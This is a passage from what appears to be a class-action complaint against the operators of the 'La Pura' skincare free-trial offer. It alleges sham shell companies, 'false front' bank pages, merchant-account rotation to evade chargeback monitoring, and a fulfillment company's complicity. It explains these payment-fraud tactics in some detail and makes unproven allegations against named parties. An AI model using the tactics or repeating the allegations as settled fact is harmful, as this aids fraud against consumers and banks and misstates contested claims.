164.   The company which billed Ms. Tan from the "skincarehealthybeautygroup" merchant account is, on information and belief, Defendant DL Group, Inc., a company that is nominally located in Arcadia, CA. The company operates a website called skincarehealthybeautygroup.com.[19] The website purports to be for a product line of creams and serums called Skin Care Healthy Beauty Group—but on information and belief, none of them actually exist. Instead, the website and the company were both a sham, used to apply for merchant accounts which were instead used to bill victims for the La Pura products.

165.   On information and belief, the remaining shell companies created by the La Pura Defendants each operate various "false front" websites designed to assist them in applying for merchant accounts and defrauding banks. The known "false fronts" operated by each shell company are identified in Exhibit 2, which is incorporated herein by reference.

---

[18] Beauty Health Remarkable Skin Website, https://beautyhealthremarkableskin.com/policies/terms-of-service (last visited May 23, 2020).
[19] Skin Care Healthy Beauty Group Website, https://www.skincarehealthybeautygroup.com/ (last visited May 23, 2020).

166.   While victims signed up for a free trial on the website https://www.try-la-pura-skincare.com, the La Pura Defendants maintained a second website—https://www.la-pura-skinproducts.com. This website was designed to appear legitimate, and makes prominent disclosures of the trial terms. It further includes a shopping cart that requires a check-box to agree to a lengthy and prominent disclosure of the terms and nature of the product subscription, and in all respects is designed to appear compliant with the law.

167.   But this second website is a fake. Victims do not actually sign up for the free trial there, and never actually view it as part of the ordering process. Instead, the sole purpose of this "false front" is to defraud the victim's credit card or banking institution. When a customer complains or requests a chargeback, the La Pura Defendants falsely claim to the bank that the customer visited this second website and agreed to its prominent disclosures. And in their e-mail communications with customers or their banks, including Ms. Tan, the La Pura Defendants used an e-mail address from this second website as part of their efforts to fraudulently convince banks that their victims had in fact consented to the terms. In all respects, the "false front" website is designed to look like a legitimate company and not a scam.

168.   On information and belief, Plaintiff and other victims of this scam were directed to the landing pages try-la-pura-skincare.com/lm/ or try-la-pura.skincare.com/l3/, rather than the "false front" website.

169.   On information and belief, the La Pura Defendants are using the "false front" website to fraudulently convince bank employees that victims had purchased La Pura products from that website, as opposed to the landing pages to which affiliates and advertisers actually directed their traffic.

170.   The maintenance of these "false front" websites is itself an act of deception, intended not just to hide from law enforcement, but to prevent consumers from exercising their lawful right to a chargeback by their bank or credit card company for charges to which they never agreed. Presented only with the false front, banks and credit card companies cannot know that there is fraud being conducted behind it.

171.   The Federal Trade Commission has recognized this tactic as a common one used by this kind of scammer: "The defendants sometimes hosted multiple versions of the same promotion. If consumers navigated from an embedded link on another site – the much more likely way people would learn about a product – they were taken to pages where products were offered for sale with what the FTC says were undisclosed automatic

shipment programs. But a funny thing happened if you just typed in the URL – for example, rippedmusclex.com. That took you to an entirely different site that included more visible disclosures of the trial offer. Why would a company create those different versions? The complaint suggests that it could have been done in an attempt to have a 'clean' version for banks, payment processors, and law enforcers."[20]

172.   This is exactly the deception Defendants have committed here. On information and belief, the La Pura Defendants operate a host of shell companies, which run websites promoting La Pura products, including www.la-pura-skinproducts.com. Each presents itself to visitors as if it is the official website of various similar products with slightly different names and labels; however, this makes no sense because there is no business reason to sell the same products from different shell companies, with near-identical websites. The true purpose of these websites is to make it more difficult for banks to identify the La Pura operation as a fraud by separating out and controlling which merchant accounts and which shell companies the chargebacks are attributed to, and thus preventing or delaying any one merchant account from being identified as conducting a fraud.

173.   On information and belief, the La Pura Defendants present the "false front" website www.la-pura-skinproducts.com to customer's banks whenever a chargeback is being investigated, fraudulently representing to the bank that it was the website the customer used to sign up for La Pura.

174.   On information and belief, the La Pura Defendants have spread their charges over multiple shell corporations as reflected by multiple merchant accounts to avoid accumulating too many chargebacks on any one account and being flagged for the fraud they are conducting. As the BBB report stated: "in one FTC case an ISO spread the credit card charges over 26 merchant accounts to disguise the fraud activity." Ex. 1, at p. 11.

---

[20] Leslie Fair, *Fauxmats, false claims, phony celebrity endorsements, and unauthorized charges*, Federal Trade Commission Business Blog (2017), https://www.ftc.gov/news-events/blogs/business-blog/2017/11/fauxmats-false-claims-phony-celebrity-endorsements (last visited Sept. 6, 2019).

175.   Ms. Tan experienced the same pattern. Within one day, she was billed from two different merchant accounts – referred to as Merchant Identifications ("MIDs") – for La Pura's products. Even La Pura's confirmation email to Ms. Tan stated she may be billed from three different merchant accounts: (1) beautifullyremarkableh; (2) beautyhealthremarkable; and (3) skincarehealthybeautygroup.

176.   The La Pura Defendants designed their scam exactly in accordance with the one Neil Patel described in his keynote speech to a roomful of scammers: "Or the credit card processors where you guys rotate up the chargebacks so then that way, then you guys can keep processing the money.... You guys, many of you have issues with credit card processing, so you'll do things like, I forgot what the saying is but they rotate up the MIGs or the MIDs, I don't know what the saying is but it's more so they're controlling where the chargebacks are going."[21]

177.   Numerous victims of La Pura's scam explained in detail their experiences in complaints posted on the Better Business Bureau, which were similar or identical to that of Ms. Tan. Indeed, La Pura received the lowest possible "F" rating on the BBB website.

178.   A victim posted on November 22, 2019: "Miss representation [sic]. I did not order the product sent to me…they sent it to me automatically. And would not cooperate with the refund policy. I would like a total refund."[22]

179.   An elderly victim posted on September 19, 2019: "They said the only charge would be shipping and that as not true. I have called them but to no avail. Please help. I'm 83 years old and cannot afford it. This came up on internet as a free gift and would only be charged a small shipping fee…I called them trying to return it and was told only then that the actual cost was $89 plus and they refused to cancel."[23]

---

[21] Neil Patel, *The Future of Affiliate Marketing: It's Not What You Think*, https://www.youtube.com/watch?v=2hUdbztKLY4 (last visited Jan. 3, 2019) (emphasis added).
[22] La Pura BBB Page, https://www.bbb.org/us/fl/odessa/profile/not-elsewhere-classified/lapura-skin-care-0653-90352238/complaints (last visited May 24, 2020).
[23] *Id.*

180.   Another victim posted on September 11, 2019: "False advertising La Pura products, and will only refund 35%.  Sometime in August, I ordered face and eye cream for shipping and handling supposedly about $10, but now have been charged $89.99 and $69.99. Called the company and they will only refund 35%."[24]

181.   Another victim posted on September 5, 2019: "La Pura offers a free sample if you agree to pay shipping charges.  Once they have your payment information, they bill you excessive amounts.  I agreed to a one-time shipping charge for a free sample of their face cream.  Over the next month, there have been four additional charges totaling $329!! When I call the customer service number on their website, they are 'unable to find my account' so they cannot address the charges or escalate the call to a supervisor because I don't have an account…I will do whatever it takes to get my money back from these crooks!! With all the complaints in just a few months, how can a company like this be allowed to continue operating? Their free sample is **** and now I'm getting ridiculous charges for no further products or services.  I don't understand how this isn't illegal!!"[25]

182.   A victim posted on April 9, 2020: "The company scammed me (no mention in their trial ad that I would automatically receive more of the product monthly, nor anything about the real cost of the product). The ruse was just pay the postage for the sample and try it! With no further conversation, they automatically billed my credit card repeatedly. When I finally realized 3 months later what was going on, I took steps to stop it and was successful in getting them to refund that month's charge. But there remains the matter of the additional $353.60 they charged without my consent. I feel I am still owed that. I offered to send back the unopened boxes of product if they would send a postage-paid address label, which they refused to do."[26]

183.   These are just a sample of the more than 100 complaints posted on the BBB website.  It is not a coincidence that so many victims are reporting the exact same thing:

---

[24] *Id.*
[25] *Id.*
[26] *Id.*

that they were told the La Pura sample would be free, that they later discovered they had been billed hundreds of dollars for a subscription they did not sign up for, and that when they tried to cancel their unauthorized subscription, the company made it as difficult as possible to do so. This is how the Defendants treat all of their victims—and the La Pura Products were just a thin excuse to commit rampant credit card fraud.

184.   La Pura purports to post a "company response" to some of the complaints by assuring the victims that they will receive a full refund. But there is no guarantee these victims actually received a full refund. Indeed, some victims report that the company requires them to return the products, but then never sends the required shipping labels to permit them to do so. This is all part of the La Pura Defendants' deceptive strategy designed to exhaust their victims until they give up.

### The La Pura Defendants' Misrepresentations
### Regarding Reviews and Endorsements

185.   On information and belief, the La Pura Defendants marketed the La Pura Products exclusively through affiliate marketing networks, such that every customer who purchases a product from them will be exposed to and view the fake celebrity and magazine endorsements described herein. Indeed, representations on both landing pages claim that the product has been the subject of either media attention or magazine articles, such that every member of the Class would necessarily have been exposed to them.

186.   These celebrity reviews and magazine appearances are material to the customers' decisions to purchase La Pura's products. Because these celebrities and magazines are well-known with well-guarded reputations, their positive, yet fraudulent, "reviews" of the products misleads customers into believing that the La Pura Defendants are a credible, well-established company. These celebrities are generally beautiful with desirable appearances, so their fake quotes suggesting they obtained their beauty by using the La Pura products misleads customers about the type of results they may expect from using the products.

## **The La Pura Defendants' Misrepresentations and Omissions**
## **Regarding Free Trials**

187.   One way the La Pura Defendants deceive consumers on their landing pages is to suggest that they are signing up for a "free trial," when in fact they are not. As described above, the sales funnel repeatedly and expressly states that consumers are signing up for a free trial. Both the "lm" and "l3" landing pages describe the offer as a "trial," and list the price for the product as either "free" or "$0.00" with the customer only paying $4.95 or $4.97 for shipping and handling. The "lm" landing page falsely represent that the victim will get "free bottle," and the "l3" landing page falsely represents that the victim will "just pay a small shipping fee."

188.   On information and belief and based on the sales funnel structure, every customer who purchased La Pura Products was exposed to similar or identical misrepresentations.

189.   The La Pura Defendants made material omissions regarding the "free trial" on their website by omitting material information, which they were under a duty to disclose relating to those trials. The La Pura Defendants failed to disclose to consumers who viewed the website that the trial was not in fact free, and that they were signing up for a subscription for the La Pura Products. These terms were concealed by burying them inside a lengthy disclaimer contained in a separate link  under "Terms and Conditions" at the very bottom of the page.

190.   The La Pura Defendants were under a duty to Plaintiff and the Class Members because they made partial representations—that the cost would be $0.00 or free and that all they would pay for was shipping and handling—but also suppressed, concealed, or did not disclose material facts that qualify those representations, namely, that there would be an ongoing subscription, that it would include more products than the one the victims signed up for, and that the victims would be charged nearly $100 every month.

191.   The La Pura Defendants knew, or by the exercise of reasonable care should have known, that their omissions were untrue and misleading, and deliberately made the

aforementioned omissions in order to deceive reasonable consumers like Plaintiff and other Class Members. Those omissions could have been corrected by including the omitted information in proximity to the trial offer on the La Pura landing page and in any other places where references to a free or trial offer occurred.

192.   The La Pura Defendants' omissions regarding the subscription payments were material to consumers. A reasonable consumer would attach importance to the truth or falsity of these omissions in deciding whether to purchase the products because if consumers had known they were not signing up for a free trial or that the actual cost would be more than $100 every month if they did not cancel almost immediately, they would not have agreed to the offer.

193.   Ms. Tan was damaged by these misrepresentations and omissions individually as described herein, and she relied on them in that she would not have signed up for the offer had she been informed of its terms.

### The La Pura Defendants' Misrepresentations
### Regarding Limited Supply

194.   The La Pura Defendants' landing pages include representations of limited supply, as described herein. But on information and belief, those purported limitations and the representations that there was "low stock," "limited quantities available," or that there were limitations on how many people could sign up for the product were false.

195.   These misrepresentations are designed to induce consumers to sign up for trials and to create a false sense of urgency. As a result of these misrepresentations, consumers purchase products they would not have purchased, they pay more for the products than they otherwise would have, or they retain products for longer than they otherwise would have and are damaged by finding that they have been subjected to a subscription to which they did not agree.

196.   The La Pura Defendants' misrepresentations regarding their purported limited supply are material to consumers. A reasonable consumer would attach importance to the truth or falsity of these misrepresentations in deciding whether to purchase the products

because if they knew that the products were not limited in supply and could be purchased at any time, consumers would not feel the need to sign up for a "free trial" on impulse and under time pressure that did not exist based on these representations. Plaintiff and the Class Members reasonably relied upon these representations in making their purchase decisions.

### The La Pura Defendants' Omissions
### Regarding the "False Front" Website

197.   The La Pura Defendants also deceived the consumers' banks and credit card companies by maintaining a "false front" website at the URL described herein. This website was created intentionally to make it appear to outsiders that the victims of the scheme had been informed of their subscriptions and had consented to them. The La Pura Defendants were under a duty to disclose to Plaintiff and the Class Members that they maintained this "false front" websites and to disclose that they routinely used that website to deceive banks and credit card companies to prevent consumers from exercising their right to a chargeback.

198.   Plaintiff and the Class Members were damaged by these omissions. All members of the class were damaged because had the banks and credit card companies not been unlawfully deceived, the scheme would have been shut down and none of the Class Members would have been billed. The La Pura Defendants further owed duties to all of the Class Members to inform them that there was a "false front" website, and the failure to do so injured every member of the Class.

199.   The La Pura Defendants made material omissions regarding the "false front" websites by omitting material information which they were under a duty to disclose relating to those sites. The La Pura Defendants failed to disclose to consumers who viewed the landing pages at try-la-pura-skincare.com/lm/ or try-la-pura-skincare.com/l3/ that there was another website, which the La Pura Defendants designed to intentionally deceive the consumer's banks or credit card companies if they attempted a chargeback, and that they were not bound by any of the terms or other disclosures on the try-la-pura-skincare.com website.

200.   The La Pura Defendants were under a duty to disclose this information to Plaintiff and the Class Members because the La Pura Defendants had exclusive knowledge of material facts not known to them, namely that there was another website being used as a "false front."

201.   Plaintiff and the Class Members did not know this, and it was difficult to discover because that information was not located on the website where they signed up for the trial because the landing pages were  designed to be inaccessible and unsearchable from any search engine, and because the "false front" website was placed on an entirely separate URL, which was not linked to the landing pages on which the victims signed up for the "free trial."

202.   The La Pura Defendants were under a duty to disclose this information to Plaintiff and the Class Members because the La Pura Defendants engaged in active concealment, and they have engaged in affirmative acts of hiding, concealing, and covering up this matter. The La Pura Defendants made efforts to hide their landing pages  from view as described above, to make the landing pages difficult to find, to delete various advertisements so customers could not find them again, and by creating the "false front" website to conceal from their victims and others the actual landing pages that the victims visited.

203.   The La Pura Defendants were further under a duty to Plaintiff and the Class Members because they made partial representations to the banks and credit card companies—that they had sold the La Pura Products to their victims—but also suppressed, concealed, and did not disclose material facts that qualify those representations, namely that none of the victims had actually signed up for the free trial on the website that was shown to banks and credit card companies. The La Pura Defendants further made partial representations to Plaintiff and the Class Members—that they would receive a free sample—without disclosing that if they attempted a chargeback, Defendants intended to lie about the terms of the agreement to the consumers' banks and credit card companies.

204.   The La Pura Defendants knew, or by the exercise of reasonable care should have known, that their omissions were untrue and misleading, and deliberately made the aforementioned omissions in order to deceive reasonable consumers like Plaintiff and other Class Members. Those omissions could have been corrected by including the omitted information in proximity to the trial offer on the try-la-pura-skincare.com/lm/ or try-la-pura.skincare.com/l3/ landing pages, or in follow-up e-mails to their victims, or in proximity to their representations to banks and credit card companies.

205.   The La Pura Defendants' omissions regarding the "false front" website were material to consumers. A reasonable consumer would attach importance to the truth or falsity of these omissions in deciding whether to purchase the products because if consumers had known that the La Pura Defendants were maintaining a fake website for the purpose of defrauding their banks and credit card companies, they would not have signed up for the "free trial."

206.   Ms. Tan was damaged by these omissions individually as described herein, and relied on them in that she would not have signed up for the offer had she been informed of this information.

### The La Pura Defendants

207.   The "La Pura Defendants" consist of the La Pura John Doe Defendants (namely, the unknown individual(s) or entities who created the La Pura product), as well as the following companies: Total Health Supply TUA Inc.; DL Group Inc.; Beautiful Skin and Health SL, Inc.; Beauty and Balance LV, Inc.; Coastal Beauty Care KV, Inc.; Coastal Health & Body TML, Inc.; Coastal Skin Care DC, Inc.; Complete Beautiful Skin DT, Inc.; Complete Dietary Health DT Inc.; Diet and Beauty Enterprise JB, Inc.; Diet Focus MG, Inc.; Dietary 8 Leaves TL, Inc.; Dietary Care Group MK, Inc.; Dietary Health DL, Inc.; Dietary Health Management SL, Inc.; Dietary Health Supplements ADN, Inc.; Dietary Mind & Body AR, Inc.; Dietary Pills TTH, Inc.; Dietary Supplements 8 Leaves TL, Inc.; Dietary Supplements NS, Inc; EM Strength & Wellness Products, Inc.; EW Ideal Health Store, Inc.; EW Radiant Skin Store, Inc.; Fit and Slim Body OLO, Inc.; Fit Body Forever

KZ, Inc.; Fit Lifestyle Enterprise JD, Inc.; Fitness & Health Supplements PKL, Inc.; Flawless Beauty Forever MC, Inc.; Forever Beautiful Products KZ, Inc.; Forever Beauty and Balance JL, Inc.; Health & Body Care TN, Inc.; Health & Skin Nutrition JLN, Inc.; Health & Wellness Products EM, Inc.; Health and Diet Products ISA, Inc.; Health and Fitness Lifestyle JL, Inc.; Health Enterprise AR, Inc.; Health Enterprise LT, Inc.; Health Skin and Beauty Maya, Inc.; Health Skin and Body JB, Inc.; Healthy and Slim TT, Inc.; Healthy Beautiful Skin JD, Inc.; Healthy Body & Balance CD, Inc.; Healthy Fit Lifestyle DC, Inc.; Healthy Leaves TL, Inc.; Healthy Lifestyle Diet JL, Inc.; Healthy Skin Group TQH, Inc.; Healthy Skin Lifestyle JB, Inc.; Healthy Supplements Maya, Inc.; Ideal Skin & Health Care NA, Inc.; Lasting Fitness & Beauty JLN, Inc.; PKL Everlasting Beauty, Inc.; Radiant Skin & Body Shop ATN, Inc.; Remarkable Beauty TN, Inc.; Remarkable Health Supply PO, Inc.; Select Skin Products MV, Inc.; Skin and Beauty NS, Inc.; Skin Beauty & Health JN, Inc.; Skin Beauty and Balance CD, Inc.; Skin Beauty Enterprise MG, Inc.; Skin Beauty Products ISA, Inc.; Skin Care Enterprise TTH, Inc.; Skin Care Group MK, Inc.; Skin Products Rubio, Inc.; Strength & Fitness Lifestyle LT, Inc.; Total Fitness & Health MC, Inc.; and Vibrant Face & Beauty Shop ATN, Inc.

208.   On information and belief, there are still unknown John Doe Defendants which are shell companies and which are also part of the "La Pura Defendants" because they were created and used to sign up for merchant accounts used as part of the scam, as described further herein.

209.   The La Pura Defendants operate both the www.try-la-pura-skincare.com and www.la-pura-skinproducts.com websites. They further operate all of the "false front" websites at issue in this case, including the ones described specifically herein and in Exhibit 2, which is incorporated herein by reference.

210.   Each of the shell companies listed runs one or more "false fronts." Exhibit 2 maps out the known websites associated with each shell company Defendant, but on information and belief, there remain a number of similar unidentified websites operated by the La Pura Defendants.

211.   While the www.la-pura-skinproducts.com website is designed to be shown to banks or credit card companies investigating chargebacks, the "false fronts" in Exhibit 2 are designed to be shown to merchant processing companies (who may or may not be aware that La Pura is a fraud, but who need a website compliant with applicable rules and regulations to approve a "MID" or merchant ID).

212.   An example of one of these "false fronts" appears below, which is from https://beautifullyremarkablehealthyskin.com/:



213.   But the same Defendant, Total Health Supply TUA, Inc., operates multiple other near-identical websites with slightly different product labels. Below is a screenshot from https://beautyhealthremarkableskin.com/:







214.   The La Pura Defendants operate at least several hundred of these websites with relabeled versions of the same products with slightly different names—all designed to appear legitimate, with clear disclosures of terms of a subscription in their shopping carts.

215.   The reason for the multiplicity of products, websites, and shell companies is that they are part of a scheme to commit bank fraud. The nature of this scheme—and of the La Pura Defendants' operation—was laid bare in a report from a receiver appointed in a Federal Trade Commission case against a different free trial scammer, *Federal Trade Commission v. Apex Capital Group, LLC et al*.[27] That receiver took control over the assets of a near-identical operation, and was thus able to provide an inside view of how their organization operated.

216.   Like the La Pura Defendants, the Defendants in the *Apex Capital* case operated two distinct types of web pages, which the receiver dubbed "sales pages" and

---

[27] Preliminary Report of Temporary Receiver, dkt. 31, *Federal Trade Commission v. Apex Capital Group, LLC et al*, No. 2:18cv9573 (C.D. Cal. filed Nov. 14, 2018).

"bank pages." As in this case, there were hundreds of the "bank pages," or false fronts, which were being used by the *Apex Capital* scammers to obtain approval from merchant processors and create hundreds of merchant accounts:[28]

> Lyons was responsible for the hundreds of "bank pages" or "clean pages." Bank pages clearly lay out all material terms of a sale and are submitted to merchant processors as part of the application process. Processors rely on the webpage submitted by merchant account applicants to accurately portray the offer and terms of sale. Defendants lied to processors via the submission of false websites (and in numerous other ways). When asked what the distinction was between bank pages and sales pages, Lyons could not explain the difference or why two pages were necessary. His only comment was that sales pages were more "salesy."

217.   The reason the La Pura Defendants created hundreds of these false fronts or "bank pages" was the same: to defraud credit card companies, a necessity given how often their merchant accounts would be flagged for fraud.

218.   As the *Apex Capital* receiver explained, this constant proliferation of websites was a necessity given the merchant processing issues faced by this kind of scammer:[29]

> Apex controlled more than a thousand websites.... Since each merchant account was required to be associated with a specific website, there had to be a proliferation of websites to match the proliferation in merchant accounts. As discussed above, Defendants created bank pages which could be submitted during the merchant account application process. Indeed, Lyons was specifically tasked with creating these pages, which had to constantly change as products and processors changed. These bank pages do not, however, drive consumer traffic – that is achieved by deceptive advertisements placed by affiliates and sales pages created by vendors.

219.   Just as the La Pura Defendants did, the *Apex Capital* scammers created numerous shell corporations to enable them to sign up for new merchant accounts. The La

---

[28] *Id.* at 7 n.11.
[29] *Id.* at 12.

Pura Defendants did so in the names of various individuals who appear to have been recruited as figureheads. The *Apex Capital* receiver explains how this worked:[30]

> Defendants overcame the merchant account challenge by recruiting people who were not on the MATCH list (aka Terminated Merchant File) to act as straw persons. Defendants built a stable of merchant accounts by enticing individuals to act as signors for entities applying for the accounts. Camacho was tasked with recruiting these individuals, who were paid $1,000 per month commissions (less a $250 cut taken by Camacho), to act as the owners of the entities. Defendants did all the work necessary: they formed the entity; opened a bank account in the name of the entity; submitted the merchant account application to the processor; and created clean bank pages for the processor to review.

220.   The La Pura Defendants' scheme worked in the same way. After these large volumes of merchant accounts were obtained, they used the Konnektive Defendants' software to perform "load balancing"—to automatically spread the purchases across merchant accounts so that chargeback levels would be balanced and the merchant accounts would not be flagged and cancelled. A normal business would only need one merchant account, because they are following the rules. The La Pura Defendants needed to run their purchases through hundreds of them, forcing the banks and credit card companies to play whack-a-mole and ensuring the fraud would continue and that they could keep selling La Pura.

221.   On information and belief, the La Pura Defendants do not follow corporate formalities and are liable for one another's actions as alter egos. On information and belief, all of these entities further commingle their assets and resources without regard for corporate formalities. The various individuals named as the executives and officers of the shell company defendants are not, in fact, in charge of those companies, and on information and belief are being paid to act as "front men." This is evidenced by all of those companies

---

[30] *Id.* at 10.

using the same registered agent to conduct their filings (Elinor Spector) and by all of the shell companies making filings in concert in certain periods (for example, March 2020). All of their merchant accounts are being used by a John Doe or John Does in a single CRM implementation, rotated by the Konnektive load balancer. The shell companies' merchant accounts are also being used to bill for products such as La Pura which they have no legal or formal connection to. It would be inequitable not to treat these entities/individuals as alter egos of one another because the corporate structure is a sham designed to avoid paying taxes, frustrate creditors, avoid document discovery requests, and hide assets.

222.   Each of the shell companies identified and listed as one of the La Pura Defendants is either a California corporation or has its principal place of business in California. As such, they are subject to personal jurisdiction because they are subject to general jurisdiction in California.

223.   The location of the John Does who created the La Pura product is currently unknown, but because they were operating all of their shell companies in California and their business operations are based out of California, they are also subject to general jurisdiction in California.

## The QuickBox Defendants

224.   Essential to the La Pura "free trial" scheme are the QuickBox Defendants, all of whom are familiar players in the "free trial" scam. The "QuickBox Defendants" consist of Defendants Quick Box LLC, Quick Holdings LLC, Stephen Adele, Chad Biggins, and James Martell. Together, they do business under the name "QuickBox Fulfillment."

225.   QuickBox Fulfillment is a "fulfillment company" which purports to be a simple shipping company. They have claimed in sworn declarations in prior litigation involving alleged free trial scams to have nothing to do with their customers' businesses other than receiving products, storing them, and shipping them to customers. But this is anything but the truth. The company was founded by and for free trial scammers, and throughout its history has intentionally and knowingly provided its clients with assistance in defrauding consumers. The La Pura scam is just one among many free trial scams that

the QuickBox Defendants have built their business on, taking a cut of the proceeds in exchange for a variety of support services.

226.    The address for QuickBox's Colorado fulfillment center is listed as the return address for the La Pura products on the "lm" landing page, indicating that it is in fact the company that shipped La Pura to Plaintiff Tan and the Class Members.[31] The "l3" landing page lists a different address in Florida, but on information and belief, the "lm" landing page is the more recent one and is the one from which Ms. Tan signed up for the "free trial."



227.    As QuickBox CEO Stephen Adele previously testified, QuickBox requires its customers to list the Quick Box fulfillment center address as their return address: "That is customary for all of our clients to do, put our return address on their return policy. In fact, I think it's required by law, too, isn't it?"[32]

228.    It is unclear whether the Florida address is associated with the QuickBox Defendants or whether there has been a change in fulfillment companies for the La Pura products. But the "false fronts" used to bill Plaintiff Tan also list QuickBox's fulfillment center as the return address, making clear that the QuickBox Defendants shipped the product to her and were assisting in the scam when she was injured. The below is an excerpt

---

[31] https://www.try-la-pura-skincare.com/lm/page-contact.php (last visited May 27, 2020).
[32] Ex. I at 115:24 – 116:1, 117:8-12, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 71.

from the "false front" websites' terms of service for the three merchant accounts used to bill Ms. Tan (all three terms of service contain this address):[33]

> Address the return package to: 11551 East 45th Ave. Unit C Denver, CO 80239 - ATTN: Returns

229.   The "false front" at https://www.la-pura-skinproducts.com/ (which is also the domain from which the La Pura John Does e-mailed Ms. Tan) similarly lists the La Pura address as being the QuickBox Defendants' Colorado address:



la'pura.

Terms & Condition | Privacy Policy | Cancel / Refund Policy | Contact Us

(877) 256-7948 | info@la-pura-skinproducts.com

La'Pura
11551 East 45th Ave., Unit C, Denver, CO 80239

230.   As described below, the La Pura marketing language was taken from QuickBox's advertising templates it distributes to its customers. And QuickBox's "Collagen Serum" appears to be a generic version of La Pura's "Tightening Serum" and "Eye Serum."[34]

231.   As La Pura's return processor, QuickBox is aware of the numerous customers who submit the products for return. Along with these returns, QuickBox is notified by

---

[33] *See* https://beautifullyremarkablehealthyskin.com/policies/terms-of-service (last visited May 27, 2020); https://beautyhealthremarkableskin.com/policies/terms-of-service (last visited May 27, 2020); https://www.skincarehealthybeautygroup.com/terms (last visited May 27, 2020).
[34] *See* http://quickbox.com/wp-content/uploads/2018/06/CollagenSerum_ProductSheet_V2.pdf (last visited May 27, 2020).

unhappy victims that they are being scammed with false advertisements and fake celebrity endorsements.

232.    The QuickBox Defendants' role in handling product returns for La Pura means that they necessarily would have had knowledge of customer complaints about the La Pura Products. On information and belief, they would have received numerous complaints similar to the ones flooding various Internet pages regarding the La Pura products.

233.    This is not the first time Quick Box LLC has been sued for its involvement in free trial scams. Quick Box LLC is a defendant in a pending lawsuit in New York federal court for participating in a host of similar scams (the "New York Action").[35] There, the Plaintiff alleged that Quick Box LLC violated its trademarks by assisting an Internet scammer in selling a host of counterfeit products as part of a celebrity free trial scam that operated identically to the one here.

234.    Notably, in the First Amended Complaint in that lawsuit—filed on January 4, 2019—Quick Box LLC and its executives and owners were indisputably put on notice of the exact details of the free trial scams its customers were running.

235.    For example, that complaint describes what the QuickBox Defendants were assisting in as follows:[36]

> As evidenced by the Consumer Complaints, numerous consumers accept Defendant Digby's online offers for purportedly "free" samples, and agree to incur a relatively small fee for shipping, around $5. Consumers typically receive the purportedly free samples within a reasonable time. However, after receiving the ordered samples, Defendant Digby begins to charge consumers much higher amounts, for hundreds of dollars per month, for the alleged purchase of larger quantities of Defendant Digby's products, effectively converting—without customer permission—what are free sample orders into

[35] The action is captioned, *RV Skincare Brands LLC v. Digby Investments Limited, Quick Box, and the Internet Domain Names GetReviveSkin.com et al.*, No. 1:18-cv-08411-VEC (S.D.N.Y), filed on September 14, 2018.
[36] First Amended Complaint at 31-32 ¶ 95, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Jan. 4, 2019), dkt. 22.

an expensive continuity program. As seen in Exhibit U, Defendant Digby's unauthorized charges are effected through the complaining consumers' credit cards. Through this scheme, Defendants exact vast amounts of money from unsuspecting consumers to effect a forced sale of unwanted quantities of Defendant Digby's products.

236.   The New York Action Complaint also attached a copy of the Better Business Bureau Report (attached hereto as Exhibit 1 to the instant Complaint)—meaning that the QuickBox Defendants were in possession of that report as of January 4, 2019 and knew full well what the free trial scam was and the details of how it worked.[37] The New York Action Complaint further provided the QuickBox Defendants with a Good Morning America segment on how the free trial scam works, as well as numerous examples of landing pages and how to identify them.[38]

237.   Instead of cleaning up its customer rolls and ending its involvement in helping free trial scammers, the QuickBox Defendants chose to rely on what is commonly termed the Sergeant Shultz Defense: "I know nothing!"[39] They initially told the New York Federal Court precisely this, claiming in a sworn declaration to have no idea who the other defendants in that lawsuit were and to have had nothing to do whatsoever with shipping any of the scam products at issue there.[40] Quick Box LLC was eventually forced to admit that it had shipped at least two of the products identified by the plaintiffs in that lawsuit,

---

[37] *Id.* at 32 ¶ 95; *Id.* at Ex. W.
[38] *Id.* at 34-35.
[39] The "Sergeant Shultz Defense" is "a legal strategy where a defendant claims innocence by virtue of having been ignorant of facts of which the defendant would normally be expected to be aware." *See* https://en.wikipedia.org/wiki/Idiot_defense (last visited Apr. 14, 2020).
[40] Declaration of Nicholas Martell, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 39 at ¶ 2 ("In fact, QuickBox had never heard of Defendant Digby or Plaintiff RV Skincare until service of the First Amended Complaint."); *id.* at ¶ 5 ("QuickBox has never provided any services to Defendant Digby and never had a relationship with Digby."); *id.* at ¶ 7 (denying allegations that QuickBox shipped various products "because again QuickBox has never worked with Defendant Digby."); *see also* dkt. 41 at 9-10 (broadly and emphatically denying all allegations that QuickBox sold infringing products).

despite its original denials.[41] Its denial was in part premised on the argument that Quick Box's shipping address on the label of a product "does not mean, however, that QuickBox ever worked with Defendant Digby,"[42] when its executives later admitted after jurisdictional discovery had been conducted that QuickBox's customers are required to include the QuickBox address for their returns.[43]

238.   In the New York Action, Quick Box LLC moved to dismiss for lack of personal jurisdiction. And in doing so, Quick Box LLC intentionally lied to a United States Federal Court about its role with respect to its customers, trying to portray itself as solely a fulfillment company involved in shipping, when it is in fact a scam-consulting operation that provides a broad array of other services, from marketing to label design to advertising consulting to chargeback mitigation to website integration with CRM systems.

239.   Quick Box LLC described its business in its Motion to Dismiss as follows:[44]

> QuickBox provides fulfillment services to brand name retailers and smaller web-based businesses who advertise and sell products to consumers. Id. ¶ 3. Because QuickBox's role is limited, it is important to understand what QuickBox does not do. QuickBox does not advertise to consumers, sell products to consumers, or receive payment from consumers. Id. **Nor does QuickBox provide any advertising, website operation, payment processing, or customer support call center services to its clients.** Id. Rather, as a fulfillment services company, QuickBox serves its clients by ensuring that their products are delivered quickly and accurately from QuickBox's warehouse to the doorsteps and mailboxes of consumers. Id.

---

[41] *Compare RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019) Dkt. 22 at ¶ 100 (alleging that two products, Revive and Le Reviva, were shipped by QuickBox and bore its address on their labels) to Dkt. 71, ex. J (shipping data proving that QuickBox did in fact ship these two products).

[42] Memorandum of Law In Support of Motion to Dismiss at 10, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 41.

[43] Ex. I at 115:24 – 116:1, 117:8-12, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 71.

